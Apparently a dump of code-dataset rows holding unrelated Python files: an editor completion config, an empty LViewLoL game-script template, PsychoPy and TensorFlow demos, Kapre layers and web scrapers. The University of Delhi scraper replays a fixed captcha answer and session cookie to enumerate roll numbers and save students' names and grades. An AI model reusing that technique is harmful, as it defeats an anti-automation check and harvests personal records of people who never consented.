# 'flags' list of compilation flags.
compilation_database_folder = 'build'
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension in [ '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile(
replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
# This is the entry point; this function is called by ycmd to produce flags for
# a file.
def FlagsForFile( filename, **kwargs ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if not compilation_info:
return None
final_flags = MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ )
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return { 'flags': final_flags }
| [
"dreisner@archlinux.org"
] | dreisner@archlinux.org |
70a410fdb55ba6085191adb8e7493ec9f4513ed9 | dff527bbd3f358f0e5bd2e261a1ace43ddec1bda | /GameplayScripts/base_script.py | 7e5392cbab9436f8ff063e107da4a8005ac38b4b | [] | no_license | 2217936322/LViewLoL | e71153806bdd4072356ac982308dd732ff1aa89b | dd699d52be34c36ecf65117a1c27463e91d60334 | refs/heads/master | 2023-04-08T07:18:04.963890 | 2021-03-18T17:21:33 | 2021-03-18T17:21:33 | 331,578,121 | 0 | 1 | null | 2021-02-09T19:59:03 | 2021-01-21T09:29:48 | null | UTF-8 | Python | false | false | 308 | py | from lview import *
lview_script_info = {
"script": "<script-name>",
"author": "<author-name>",
"description": "<script-description>",
"target_champ": "none"
}
def lview_load_cfg(cfg):
pass
def lview_save_cfg(cfg):
pass
def lview_draw_settings(game, ui):
pass
def lview_update(game, ui):
pass | [
"laur.h_97@yahoo.ro"
] | laur.h_97@yahoo.ro |
788e7d9a05ef24b4d7c13c24a8099e7870593310 | f819a51511966db4366a2dba363e75b5e0476171 | /gratings.py | 6ba47d43cd66248af81d679c3c20b0c8a60726b0 | [] | no_license | jankaWIS/run_psychopy | ba68926788139d8214b04a54587d5b3e9e1ecb45 | dfaee2f3fc0f3435d6277921428bbf0fea57ec95 | refs/heads/master | 2021-05-18T15:34:04.482953 | 2020-06-17T08:36:23 | 2020-06-17T08:36:23 | 251,299,788 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 324 | py | import psychopy.visual
import psychopy.event
win = psychopy.visual.Window(
size=[400, 400],
units="pix",
fullscr=False # Set to True for full screen
)
grating = psychopy.visual.GratingStim(
win=win,
units="pix",
size=[150, 150]
)
grating.draw()
win.flip()
psychopy.event.waitKeys()
win.close()
| [
"jan.kadlec@weizmann.ac.il"
] | jan.kadlec@weizmann.ac.il |
ac1dc5c4fb536dadca4830f3ca64e1213940035f | 13e76d26c4310f6a5d4118b778bb22b914dc8dd9 | /tfTwo/linearRegression.py | 3c04ab8e201190aaa88d8d8ed68b9254c49150af | [] | no_license | lbndpcoder/notesAtwork | ba215409d8735ab3f48bf5239f9351f9550781e9 | ab9d8026a5d9f82b62581f401853ae41cc8a6b20 | refs/heads/master | 2020-12-03T04:23:03.228461 | 2020-05-04T09:52:39 | 2020-05-04T09:52:39 | 231,199,051 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,205 | py | import numpy as np
import tensorflow as tf
print(tf.__version__)
'''
# 声明固定的参数
a = tf.constant([[1, 2]])
b = tf.constant([[1, 2]])
# 加法运算
c = tf.add(a, b)
print(c)
'''
# 针对性的自动求导数
'''
x = tf.Variable(3.)
with tf.GradientTape() as tape:
y = tf.square(x)
y_grad = tape.gradient(y, x)
print(y_grad)
'''
# linear regression
# data
X_raw = np.array([2013, 2014, 2015, 2016, 2017], dtype=np.float32)
y_raw = np.array([12000, 14000, 15000, 16500, 17500], dtype=np.float32)
# normalization
X = (X_raw - X_raw.min()) / (X_raw.max() - X_raw.min())
y = (y_raw - y_raw.min()) / (y_raw.max() - y_raw.min())
X = tf.constant(X)
y = tf.constant(y)
a = tf.Variable(0.)
b = tf.Variable(0.)
variables = [a, b]
epoh = 100
# 定义优化函数
optimizers = tf.keras.optimizers.SGD(learning_rate=5e-4)
for e in range(epoh):
# 定义求导的范围 / 损失函数
with tf.GradientTape() as tape:
y_pre = a * X + b
loss = tf.reduce_sum(tf.square(y_pre - y))
# 进行求导
grads = tape.gradient(loss, variables)
# 优化函数需要导数以及对应的变量
optimizers.apply_gradients(grads_and_vars=zip(grads, variables))
print(a, b)
| [
"liubonan@liubonandeMBP.lan"
] | liubonan@liubonandeMBP.lan |
6c2fdf1f4c07cf50cf12ac55c8aa7bbf61b7a2ad | f88534befb2758f5f20d96a507950534a590f0e5 | /script/kapre_variants.py | d0c524e5ffaa0f57babbc511a4266b7adfe247cd | [
"Apache-2.0"
] | permissive | spun-oliver/waffler | 8a07ef218e1ec261da59853793792fc1605d9d93 | cd9c7590de4656389c6b9e8bf81d03eaa625f750 | refs/heads/master | 2022-01-18T16:54:09.480744 | 2019-05-17T11:49:13 | 2019-05-17T11:49:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,769 | py |
from kapre.utils import Normalization2D
import keras.backend as K
from tensorflow import atan
class FixedNormalization2D(Normalization2D):
"""
As kapre's Normalization2D, but initialise with precomputed ('fixed') mean and std,
rather than computing these on the batch to be normalised.
"""
def __init__(self, **kwargs):
self.mean = kwargs['mean']
self.std = kwargs['std']
del kwargs['mean']
del kwargs['std']
super(FixedNormalization2D, self).__init__(**kwargs)
def call(self, x, mask=None):
return (x - self.mean) / (self.std + self.eps)
### --- TODO: unused? ---
class Scale2D(Normalization2D):
"""
As kapre's Normalization2D, but adds the mean back in.
"""
def call(self, x, mask=None):
if self.axis == -1:
mean = K.mean(x, axis=[3, 2, 1, 0], keepdims=True)
std = K.std(x, axis=[3, 2, 1, 0], keepdims=True)
elif self.axis in (0, 1, 2, 3):
all_dims = [0, 1, 2, 3]
del all_dims[self.axis]
mean = K.mean(x, axis=all_dims, keepdims=True)
std = K.std(x, axis=all_dims, keepdims=True)
return ((x - mean) / (std + self.eps)) + mean
class Shift2D(Normalization2D):
"""
As kapre's Normalization2D, but without scaling.
"""
def call(self, x, mask=None):
if self.axis == -1:
mean = K.mean(x, axis=[3, 2, 1, 0], keepdims=True)
# std = K.std(x, axis=[3, 2, 1, 0], keepdims=True)
elif self.axis in (0, 1, 2, 3):
all_dims = [0, 1, 2, 3]
del all_dims[self.axis]
mean = K.mean(x, axis=all_dims, keepdims=True)
# std = K.std(x, axis=all_dims, keepdims=True)
return (x - mean)
| [
"owatts@staffmail.ed.ac.uk"
] | owatts@staffmail.ed.ac.uk |
b3bb36275b2d2d6a69aa66275e76d886a7bcace6 | f2bd2a3c4d8d48341cc96e7842020dd5caddff8e | /archive/DUCS-MCA-Batch-2017-2020/DU-PG-2019-4th-sem/PGMCA.py | 7bd43c71e2b9923029291dac9de842d0d69e309d | [
"MIT"
] | permissive | jatin69/du-result-fetcher | ab51684bfa9c52ffcd45edf0d9d6784f1e6fd28e | 4106810cc06b662ba53acd5853b56c865f39f1a4 | refs/heads/master | 2022-12-09T07:08:25.614765 | 2022-12-01T12:56:02 | 2022-12-01T12:56:02 | 118,005,826 | 7 | 0 | MIT | 2022-12-01T12:56:03 | 2018-01-18T16:08:03 | Python | UTF-8 | Python | false | false | 13,441 | py | # dependencies
import requests
from bs4 import BeautifulSoup
import re
import sys
import os
savePath = "html"
if not os.path.isdir(savePath):
os.mkdir(savePath)
# link for 6th sem 2019 - new link
GradeCard = "http://duresult.in/students/Combine_GradeCard.aspx"
CONST_VIEWSTATE = """/wEPDwUJOTc3OTgxMzM3DxYEHgdjYXB0Y2hhBQYxODIyODkeCUlwQWRkcmVzcwUMMTAzLjc4LjE0OC44FgICAw9kFgwCAQ9kFgICBQ8PFgIeBFRleHQFNFJlc3VsdHMgKFNlbWVzdGVyL0FubnVhbCBFeGFtaW5hdGlvbiBNYXktSnVuZSAyMDE5IClkZAIHDw8WAh8CBRAgKE1heS1KdW5lIDIwMTkpZGQCFQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQlDT0xMX05BTUUeDkRhdGFWYWx1ZUZpZWxkBQlDT0xMX0NPREUeC18hRGF0YUJvdW5kZ2QQFX8SPC0tLS0tU2VsZWN0LS0tLS0+HEFjaGFyeWEgTmFyZW5kcmEgRGV2IENvbGxlZ2UkQWRpdGkgTWFoYXZpZGhsYXlhIChUZWFjaGluZyBDZW50cmUpE0FkaXRpIE1haGF2aWR5YWxheWElQXJ5YWJoYXR0YSBDb2xsZWdlIChUZWFjaGluZyBDZW50cmUpID1BcnlhYmhhdHRhIENvbGxlZ2UgW0Zvcm1lcmx5IFJhbSBMYWwgQW5hbmQgQ29sbGVnZSAoRXZlbmluZyldH0F0bWEgUmFtIFNhbmF0YW4gRGhhcmFtIENvbGxlZ2UYQmhhZ2luaSBOaXZlZGl0YSBDb2xsZWdlKkJoYWdpbmkgTml2ZWRpdGEgQ29sbGVnZSAoVGVhY2hpbmcgQ2VudHJlKQ9CaGFyYXRpIENvbGxlZ2UhQmhhcmF0aSBDb2xsZWdlIC0gVGVhY2hpbmcgQ2VudHJlKkJoYXNrYXJhY2hhcnlhIENvbGxlZ2Ugb2YgQXBwbGllZCBTY2llbmNlcxFDQU1QVVMgTEFXIENFTlRSRRdDYW1wdXMgb2YgT3BlbiBMZWFybmluZyJDbHVzdGVyIElubm92YXRpb24gQ2VudHJlIChDLkkuQy4pHUNvbGxlZ2UgT2YgVm9jYXRpb25hbCBTdHVkaWVzL0NvbGxlZ2Ugb2YgVm9jYXRpb25hbCBTdHVkaWVzIChUZWFjaGluZyBDZW50cmUpEkRhdWxhdCBSYW0gQ29sbGVnZRxEZWVuIERheWFsIFVwYWRoeWF5YSBDb2xsZWdlLkRlZW4gRGF5YWwgVXBhZGh5YXlhIENvbGxlZ2UgKFRlYWNoaW5nIENlbnRyZSkgRGVsaGkgQ29sbGVnZSBPZiBBcnRzICYgQ29tbWVyY2UaRGVsaGkgU2Nob29sIG9mIEpvdXJuYWxpc21kRGVwYXJ0bWVudCBvZiBCb3RhbnkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGREZXBhcnRtZW50IG9mIENoZW1pc3RyeSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgFkRlcGFydG1lbnQgb2YgQ29tbWVyY2VkRGVwYXJ0bWVudCBvZiBDb21wdXRlciBTY2llbmNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEZXBhcnRtZW50IG9mIEVkdWNhdGlvbiAoQy5JLkUuKRVEZXBhcnRtZW50IG9mIEVuZ2xpc2gXRGVwYXJ0bWVudCBvZiBHZW9ncmFwaHkqRGVwYXJ0bWVudCBvZiBHZXJtYW5pYyBhbmQgUm9tYW5jZSBTdHVkaWVzE0RlcGFydG1lbnQgb2YgSGluZGkVRGVwYXJ0bWVudCBvZiBIaXN0b3J5G0RlcGFydG1lbnQgb2YgSGlzdG9yeSAoU0RDKS1EZXBhcnRtZW50IG9mIExpYnJhcnkgYW5kIEluZm9ybWF0aW9uIFNjaWVuY2VkRGVwYXJ0bWVudCBvZiBNYXRoZW1hdGljcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIBNEZXBhcnRtZW50IG9mIE11c2ljZERlcGFydG1lbnQgb2YgUGh5c2ljcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAfRGVwYXJ0bWVudCBvZiBQb2xpdGljYWwgU2NpZW5jZRZEZXBhcnRtZW50IG9mIFNhbnNrcml0ZERlcGFydG1lbnQgb2YgU29jaWFsIFdvcmsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRGVwYXJ0bWVudCBvZiBTdGF0aXN0aWNzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGREZXBhcnRtZW50IG9mIFpvb2xvZ3kgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgGERlc2hiYW5kaHUgQ29sbGVnZSAoRGF5KStEci4gQW1iZWRrYXIgQ2VudGVyIGZvciBCaW9tZWRpY2FsIFJlc2VhcmNoI0RyLiBCLlIuIEFtYmVka2FyIChUZWFjaGluZyBDZW50cmUpHURyLiBCaGltIFJhbyBBbWJlZGthciBDb2xsZWdlNUR1cmdhYmFpIERlc2htdWtoIENvbGxlZ2Ugb2YgU3BlY2lhbCBFZHVjYXRpb24gKFYuSS4pGER5YWwgU2luZ2ggQ29sbGVnZSAoRGF5KRhEeWFsIFNpbmdoIENvbGxlZ2UgKEV2ZSkdRmFjdWx0eSBvZiBNYW5hZ2VtZW50IFN0dWRpZXMNR2FyZ2kgQ29sbGVnZRBIYW5zIFJhaiBDb2xsZWdlIkhhbnMgUmFqIENvbGxlZ2UgLSBUZWFjaGluZyBDZW50cmUNSGluZHUgQ29sbGVnZRVJLlAuQ29sbGVnZSBGb3IgV29tZW42SW5kaXJhIEdhbmRoaSBJbnN0aXR1dGUgb2YgUGh5LiBFZHUuICYgU3BvcnRzIFNjaWVuY2VzLkluc3RpdHV0ZSBvZiBDeWJlciBTZWN1cml0eSBhbmQgTGF3IChJLkMuUy5MLikbSW5zdGl0dXRlIE9mIEhvbWUgRWNvbm9taWNzG0phbmtpIERldmkgTWVtb3JpYWwgQ29sbGVnZS1KYW5raSBEZXZpIE1lbW9yaWFsIENvbGxlZ2UgLSBUZWFjaGluZyBDZW50cmUUSmVzdXMgJiBNYXJ5IENvbGxlZ2UmSmVzdXMgJiBNYXJ5IENvbGxlZ2UgLSBUZWFjaGluZyBDZW50cmUMSnViaWxlZSBIYWxsD0thbGluZGkgQ29sbGVnZSFLYWxpbmRpIENvbGxlZ2UgLSBUZWFjaGluZyBDZW50cmUTS2FtbGEgTmVocnUgQ29sbGVnZSRLZXNoYXYgTWFoYXZpZGxheWEgKFRlYWNoaW5nIENlbnRyZSkUS2VzaGF2IE1haGF2aWR5YWxheWESS2lyb3JpIE1hbCBDb2xsZWdlEkxhZHkgSXJ3aW4gQ29sbGVnZR5MYWR5IFNyaSBSYW0gQ29sbGVnZSBGb3IgV29tZW4STGFrc2htaWJhaSBDb2xsZWdlJExha3NobWliYWkgQ29sbGVnZSAtIFRlYWNoaW5nIENlbnRyZQxMQVcgQ0VOVFJFLUkNTEFXIENFTlRSRS1JSRhNYWhhcmFqYSBBZ3Jhc2VuIENvbGxlZ2UqTWFoYXJhamEgQWdyYXNlbiBDb2xsZWdlIC0gVGVhY2hpbmcgQ2VudHJlJU1haGFyc2hpIFZhbG1pa2kgQ29sbGVnZSBvZiBFZHVjYXRpb24QTWFpdHJleWkgQ29sbGVnZSJNYWl0cmV5aSBDb2xsZWdlIC0gVGVhY2hpbmcgQ2VudHJlHU1hdGEgU3VuZHJpIENvbGxlZ2UgRm9yIFdvbWVuL01hdGEgU3VuZHJpIENvbGxlZ2UgRm9yIFdvbWVuIC0gVGVhY2hpbmcgQ2VudHJlDU1pcmFuZGEgSG91c2UfTWlyYW5kYSBIb3VzZSAoVGVhY2hpbmcgQ2VudHJlKRxNb3RpIExhbCBOZWhydSBDb2xsZWdlIChEYXkpHE1vdGkgTGFsIE5laHJ1IENvbGxlZ2UgKEV2ZSkoTW90aSBMYWwgTmVocnUgQ29sbGVnZSAoVGVhY2hpbmcgQ2VudHJlKSxOb24gQ29sbGVnaWF0ZSBXb21lbiBFZHVjYXRpb24gQm9hcmQgKE5DV0VCKRhQLkcuRC5BLlYuIENvbGxlZ2UgKERheSkYUC5HLkQuQS5WLiBDb2xsZWdlIChFdmUpJFAuRy5ELkEuVi4gQ29sbGVnZSAtIFRlYWNoaW5nIENlbnRyZRBSYWpkaGFuaSBDb2xsZWdlIlJhamRoYW5pIENvbGxlZ2UgKFRlYWNoaW5nIENlbnRyZSkbUmFtIExhbCBBbmFuZCBDb2xsZWdlIChEYXkpEVJhbWFudWphbiBDb2xsZWdlI1JhbWFudWphbiBDb2xsZWdlIChUZWFjaGluZyBDZW50cmUpDlJhbWphcyBDb2xsZWdlF1MuRy5ULkIuIEtoYWxzYSBDb2xsZWdlF1NhdHlhd2F0aSBDb2xsZWdlIChEYXkpF1NhdHlhd2F0aSBDb2xsZWdlIChFdmUpJFNhdHlhd2F0aSBDb2xsZWdlIChUZWFjaGluZyBDZW50cmUpIBdTY2hvb2wgb2YgT3BlbiBMZWFybmluZyJTaGFoZWVkIEJoYWdhdCBTaW5naCBDb2xsZWdlIChEYXkpIlNoYWhlZWQgQmhhZ2F0IFNpbmdoIENvbGxlZ2UgKEV2ZSk1U2hhaGVlZCBSYWpndXJ1IENvbGxlZ2Ugb2YgQXBwbGllZCBTY2llbmNlcyBmb3IgV29tZW4rU2hhaGVlZCBTdWtoZGV2IENvbGxlZ2Ugb2YgQnVzaW5lc3MgU3R1ZGllcw9TaGl2YWppIENvbGxlZ2UXU2h5YW0gTGFsIENvbGxlZ2UgKERheSkXU2h5YW0gTGFsIENvbGxlZ2UgKEV2ZSkxU2h5YW1hIFByYXNhZCBNdWtoZXJqZWUgQ29sbGVnZSAtIFRlYWNoaW5nIENlbnRyZShTaHlhbWEgUHJhc2FkIE11a2hlcmppIENvbGxlZ2UgZm9yIFdvbWVuFlNPTCBTdHVkeSBDZW50ZXIgU291dGgbU3JpIEF1cm9iaW5kbyBDb2xsZWdlIChEYXkpG1NyaSBBdXJvYmluZG8gQ29sbGVnZSAoRXZlKSdTcmkgQXVyb2JpbmRvIENvbGxlZ2UgKFRlYWNoaW5nIENlbnRyZSkpU3JpIEd1cnUgR29iaW5kIFNpbmdoIENvbGxlZ2UgT2YgQ29tbWVyY2U7U3JpIEd1cnUgR29iaW5kIFNpbmdoIENvbGxlZ2UgT2YgQ29tbWVyY2UgLSBUZWFjaGluZyBDZW50cmUhU3JpIEd1cnUgTmFuYWsgRGV2IEtoYWxzYSBDb2xsZWdlG1NyaSBSYW0gQ29sbGVnZSBPZiBDb21tZXJjZRhTcmkgVmVua2F0ZXN3YXJhIENvbGxlZ2UUU3QuIFN0ZXBoZW5zIENvbGxlZ2UaU3dhbWkgU2hyYWRkaGFuYW5kIENvbGxlZ2UTVW5pdmVyc2l0eSBvZiBEZWxoaRNWaXZla2FuYW5kYSBDb2xsZWdlJVZpdmVrYW5hbmRhIENvbGxlZ2UgLSBUZWFjaGluZyBDZW50cmUaWmFraXIgSHVzYWluIENvbGxlZ2UgKEV2ZSkgWmFraXIgSHVzYWluIERlbGhpIENvbGxlZ2UgKERheSkVfxI8LS0tLS1TZWxlY3QtLS0tLT4DMDAxBDEzMTQDMDAyBDEzMTUDMDU5AzAwMwMwMDcEMTMxNwMwMDgEMTMwNwMwMDkDMzA5A0NPTAMzMTIDMDEzBDEzMTgDMDE0AzAxNQQxMzI2AzAxNgMzMTYDMjE2AzIxNwMyNDEDMjM0AzI0MwMyMDMDMjI5AzIwNAMyMDUDMjMxAzI5MQMyMDYDMjM1AzI0MAMyMjIDMjMyAzIxMwMyMzMDMjM3AzIyMwMwMTkDMzE4BDEzMTYDMDEwAzMxNAMwMjEDMDIyAzEwOQMwMjQDMDI1BDEzMTMDMDI2AzAyOQMwMjgDMzE3AzAzMAMwMzEEMTMwNAMwMzIEMTMwOAMzMDYDMDMzBDEzMDUDMDM0BDEzMTkDMDM1AzAzNgMwMzgDMDM5AzA0MAQxMzEwAzMxMAMzMTEDMDQxBDEzMDIDMzE1AzA0MwQxMzA5AzA0NAQxMzAzAzA0NwQxMzIwAzA0OAMwNDkEMTMyMQMzMDcDMDUzAzA1NAQxMzExAzA1NQQxMzIyAzA1OAMwMjAEMTMyMwMwNTYDMDY4AzA2MgMwNjMEMTMyNANTT0wDMDY0AzA2NQMwNjYDMDY3AzA3MQMwNzMDMDc0BDEzMDYDMDc1BFNPTFMDMDc2AzA3NwQxMzI1AzA3OAQxMzEyAzA2OQMwNzIDMDc5AzA4MAMwODEDMTAwAzA4NAQxMzAxAzA4NgMwODUUKwN/Z2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAh0PZBYCZg9kFgICAw8PFgIeCEltYWdlVXJsBUNHZW5lcmF0ZUNhcHRjaGEuYXNweD9DYXB0Y2hhQ29kZT0xODIyODkmRGF0ZVRpbWU9NjM2OTczOTcyNzY0MDA1Nzk2ZGQCJw8PFgIeB1Zpc2libGVoZGQCLQ8PFgIfB2hkZGR2bl/3EI/pExtevTdMuWF0S/G/qQ=="""
CONST_VIEWSTATEGENERATOR = """35D4F7A9"""
CONST_EVENTVALIDATION = """/wEWhQECrP631AECq8PapwoCypTxxQ4CwPyMgQgCwfyo/goC5evuqgICwfzcmgMC6KaP6wkC/oLBtwQC4uX5gA8Cwfz0UALXj7neBwKsxZLHDgLoppvrCQLvppvrCQKewq+LCALY6+KqAgL+gsW3BALB/Ni7AgKTuKfBCQK017nqAwLa66LBDQLJzpv3BQLMzpv3BQLPzpv3BQLg5f2ADwLG/LyBCAKRuN/ACQL8gvG3BAL8gsG3BALuppPrCQKRuKPBCQKq14XqAwLG/LiBCALG/OCBCALPzuf3BQKq17HqAwKtxdr3BgLb6+aqAgLb65qqAgL8gsW3BAL8gv23BALg5fWADwL8gvm3BALopp/rCQLKj73eBwLB/MC3CAKvxa70BgKWuKfBCQLA/ISBCALl6+aqAgLpppvrCQKTuNvACQK0173qAwLB/ITFDQLJzp/3BQLoppPrCQLXj7HeBwLh5f2ADwKvxab0BgLA/LiBCAKsxdZUAuXrmqoCAqzFxq4IAszO5/cFAv6C/bcEAqzF+vEJApO438AJAsH8zNQKArTXseoDAsnOk/cFAtePtd4HAuiml+sJAq/F2vcGAsH8+NIHAqLFrvQGAsf8gIEIAsD8vIEIAqzFvp8DAqvXueoDAv6C8bcEAqzF6ksCk7jTwAkCrMWiuAgC4uXpgA8C2uva/wkC14+p3gcC6KaL6wkC2uvOmAYC4eX5gA8C/oL1twQCk7jXwAkCwfzsjwwCtNep6gMC2uvytQ8C14+t3gcCr8Wi9AYC2uvm7gcCyc6L9wUC14+h3gcC5euWqgIC/oLptwQC2uuKiwwCrsKviwgCk7jLwAkCtNet6gMCyc6P9wUC4uXhgA8CwPyogQgC/oLttwQCk7jPwAkCrMXuqgYCtNeh6gMCrsKr/gkCyc6D9wUC4uXlgA8C2uu+pAUC14+l3gcCwfyQqAUC6KaD6wkC5euKqgIC6KaH6wkCr8WK9AYCwPzsgQgCrMWq9AYCk7iDwQkCrMWK4goCyc7H9wUCtNfl6gMCtPew8AwCwJ/r5gwC75nRggMCpZ/ziwJBxkgslz2Udq2i1suw/QwLnFI92A=="""
# store marks list for all DU
college_sgpa_list = []
# list codes for all CS colleges
all_colleges = [
"16001570001",
"16003570001",
"16009570001",
"16013570001",
"16015570001",
"16020570001",
"16021570001",
"16025570001",
"16029570001",
"16033570001",
"16035570001",
"16044570001",
"16053570001",
"16058570001",
"16059570001",
"16066570001",
"16067570001",
"16068570001",
"16075570001",
"16078570001"
]
# override for one college check
all_colleges = [
"1724501"
]
for col in all_colleges:
dduc = []
constantCollegePart = col[:-2]
for i in range(1,10):
dduc.append([constantCollegePart + '0' + str(i)])
for i in range(10,50):
dduc.append([constantCollegePart + str(i)])
# testing generation of rollnos
# print(dduc)
# break
# dduc = [['17015570001']]
VAR_collegeCode = "234"
for VAR_stud in dduc:
VAR_rollno = VAR_stud[0]
# print(VAR_rollno)
payload = {
'__EVENTTARGET' : '',
'__EVENTARGUMENT' : '',
'__VIEWSTATE': CONST_VIEWSTATE,
'__VIEWSTATEGENERATOR': CONST_VIEWSTATEGENERATOR,
'__EVENTVALIDATION': CONST_EVENTVALIDATION,
'ddlcollege' : VAR_collegeCode,
'txtrollno' : VAR_rollno,
'txtcaptcha' : '182289',
'btnsearch': 'Print+Score+Card'
}
# infinite cookie life
cookies = {'ASP.NET_SessionId': 'efstl5454kxusy45e35h45j1'}
soup = None
count = 0
while(soup == None):
r = requests.post(GradeCard, data=payload, cookies=cookies)
# print(r.text)
soup = BeautifulSoup(r.text, 'html.parser')
if(soup==None):
continue
# print(soup.title.string)
if(soup.title.string == "Runtime Error"):
if count == 5:
break
else:
count = count + 1
soup = None
continue
if count == 5:
continue
# for img in soup.find_all('img'):
# img.decompose()
#t = soup.find('span', attrs={'id':'lblstatement'}).decompose()
#t = soup.find('span', attrs={'id':'lbl_sub_head3'}).decompose()
#t = soup.find('span', attrs={'id':'lbldisclaimer'}).decompose()
# // todo
# sgpa_table = soup.find("span", {"id": "lbl_gr_cgpa"})
# print(soup)
# print(college_sgpa_list)
if soup.find("span", id="lblcollege") == None:
continue
if soup.find("span", id="lblname") == None:
continue
VAR_college = soup.find("span", id="lblcollege").text
VAR_sname = soup.find("span", id="lblname").text
# writing result to html file
savePath = "html/"+VAR_college.replace(' ', '_')
if not os.path.isdir(savePath):
os.mkdir(savePath)
VAR_filename = savePath + '/' + VAR_rollno + '__' + VAR_sname + '__' + '.html'
with open(VAR_filename, "w") as file:
file.write(str(soup))
# print(VAR_college, VAR_sname);
# total = soup.find("table", id="lblgrandtotal")
sgpa_table = soup.find("table", {"id": "gvrslt"})
if(sgpa_table == None ):
continue
try:
obtained_marks = int(sgpa_table.findAll('tr')[4].findAll('td')[1].text)
total_marks = 5
FINAL_CGPA = (obtained_marks)/total_marks
print([VAR_rollno, VAR_sname, FINAL_CGPA, VAR_college])
except IndexError:
continue
college_sgpa_list.append([VAR_rollno, VAR_sname, FINAL_CGPA, VAR_college])
exit
college_sgpa_list.sort(key = lambda x : x[2], reverse=True)
# print(college_sgpa_list)
# print to file
with open('DU-PG-MCA-2019-4th-sem.txt','w') as f:
print('{3:<5} {0:15} {1:25} {2:10} {4:<40}'.format("Roll No.","Name","Sem-IV","S.No", "College"), file=f)
for i,marks in enumerate(college_sgpa_list):
print('{3:<5} {0:15} {1:25} {2:<10} {4:<40}'.format(marks[0],marks[1],marks[2], i+1, marks[3]), file=f)
# CSV print to file
with open('DU-PG-MCA-2019-4th-sem.csv.txt','w') as f:
print('{3:<5} ,{0:15} ,{1:25} ,{2:10} ,{4:<40}'.format("Roll No.","Name","Sem-IV","S.No", "College"), file=f)
for i,marks in enumerate(college_sgpa_list):
print('{3:<5} ,{0:15} ,{1:25} ,{2:<10} ,{4:<40}'.format(marks[0],marks[1],marks[2], i+1, marks[3]), file=f)
# print(soup.prettify())
# with open("test.html", "w") as file:
# file.write(str(soup))
| [
"jatin.mca17.du@gmail.com"
] | jatin.mca17.du@gmail.com |
7644d77665604f354af3eb7792920e24a0cf8178 | 1b48f6f17790b7498046c53f646e0548846a7074 | /feisresults/spiders/feisresults_spider.py | b143a697aa167f6898ccba7325d26a44e53fcdc0 | [] | no_license | jonpresley/feisresults | b14ac62d87183d3e3155541cfe83ef14f2901c21 | aaf56fa6e83872b926f94301882429fd5bb6a8fb | refs/heads/master | 2020-05-16T08:14:32.068426 | 2019-04-24T20:56:38 | 2019-04-24T20:56:38 | 182,902,552 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,537 | py | from scrapy import Spider, Request
from feisresults.items import FeisresultsItem
import re
class FeisresultsSpider(Spider):
name = 'feisresults_spider'
allowed_urls = ['https://www.feisresults.com/']
start_urls = ['http://www.feisresults.com/results1.php']
def parse(self, response):
# years posted on website
result_years_lst = list(range(2019,2007,-1))
# List comprehension to construct all the urls for the years
result_years_urls = ['http://www.feisresults.com/results1.php?year={}'.format(x) for x in result_years_lst]
print('level 1')
# Yield the requests to different year urls,
# using parse_year_page function to parse the response.
for url in result_years_urls[:]:
print(url)
